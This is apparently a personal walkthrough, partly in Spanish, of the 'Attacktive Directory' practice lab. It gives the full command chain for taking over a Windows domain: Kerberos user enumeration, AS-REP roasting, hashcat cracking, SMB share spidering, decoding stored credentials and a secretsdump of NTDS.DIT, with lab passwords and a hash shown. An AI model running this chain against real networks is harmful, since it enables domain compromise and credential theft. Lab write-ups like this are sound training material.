nmapAutomator.sh 10.10.220.188 Basic

Pasted image 20210613095239.png

Pasted image 20210613095315.png

#using enum4linux for smb perl /opt/enum4linux/enum4linux.pl 10.10.220.188

Pasted image 20210613100634.png

echo "10.10.220.188 spookysec.local" | sudo tee -a /etc/hosts

Usamos los archivos de usuario y contrasena que se nos da en https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

#fuerza bruta para usuarios de Kerberos ./kerbrute\_linux\_amd64 userenum --dc spookysec.local -d spookysec.local home/kali/Downloads/attacktive-directory-tools-master/userlist.txt -t 100

Pasted image 20210613113829.png

python3 /opt/impacket/GetNPUsers.py spookysec.local/svc-admin -request -no-pass -dc-ip 10.10.220.188

Pasted image 20210613115458.png

https://hashcat.net/wiki/doku.php?id=example_hashes

Pasted image 20210613120655.png

Guardamos el hash en un archivo llamado hash.txt

hashcat --force -m 18200 -a 0 /home/kali/Desktop/boxes/hash.txt /usr/share/wordlists/rockyou.txt

Pasted image 20210613121215.png

Pasted image 20210613121147.png

crackmapexec smb 10.10.7.181 -u svc-admin -p management2005 --shares

Pasted image 20210613122256.png

crackmapexec smb 10.10.7.181 -u svc-admin -p management2005 --spider backup --pattern txt

Pasted image 20210613123923.png

smbclient -U spookysec.local/svc-admin //10.10.7.181/backup

Pasted image 20210613125947.png

cat backup\_credentials.txt

Pasted image 20210613130004.png

echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d

Pasted image 20210613130108.png

Para hacer un dump de NTDS.DIT corremos lo siguiente:

python3 /opt/impacket/examples/secretsdump.py -dc-ip 10.10.7.181 spookysec.local/backup:backup2517860@10.10.7.181

Pasted image 20210613131836.png

El hash de NTLM es 0e0363213e37b94221497260b0bcb4fc

Pasted image 20210613132224.png

boxes

copyright©2022 Cu3rv0x all rights reserved